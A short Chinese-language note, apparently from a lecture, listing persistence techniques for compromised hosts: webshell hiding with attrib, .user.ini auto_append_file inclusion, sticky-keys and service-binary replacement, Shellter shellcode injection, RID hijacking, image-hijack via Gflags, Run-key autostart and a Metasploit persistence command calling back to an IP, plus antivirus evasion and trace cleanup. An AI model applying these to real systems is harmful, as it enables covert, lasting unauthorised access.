持久化的一些方法
之前讲了次课准备的,ppt就不放了,当时的思路搬运过来 --- 需要思考的几个问题 1 返回路径 (网络出口,网络之间) 2 部署方式及免杀 (个人电脑,服务器,杀软) 3 痕迹清理 web相关 1 webshell attrib +s +h test.php 隐藏test.php文件 attrib命令 用于修改文件属性 +s 设置系统文件属性 +h 设置隐藏属性 .user.ini auto_append_file = 1.gif user_ini.cache_ttl = 10 auto_append_file 包含要执行的文件 user_ini.cache_ttl 重新读取用户 INI 文件的间隔时间 2 代码修改 windows 1 程序替换 shift后门 替换不常用服务程序 对于开源软件,重新编译目标使用的程序,比如notepad++,mysql 程序内插入shellcode shellter 2 rid hijack(账户克隆) 3 注册表映像劫持 Gflags.exe 4 自启动 HKCU\Software\Microsoft\Windows\CurrentVersion\Run msf persistence run persistence -X -i 5 -p 4445 -r 1.1.1.1 缺点:容易被杀软发现 优点:种植容易 注册表路径: HKCU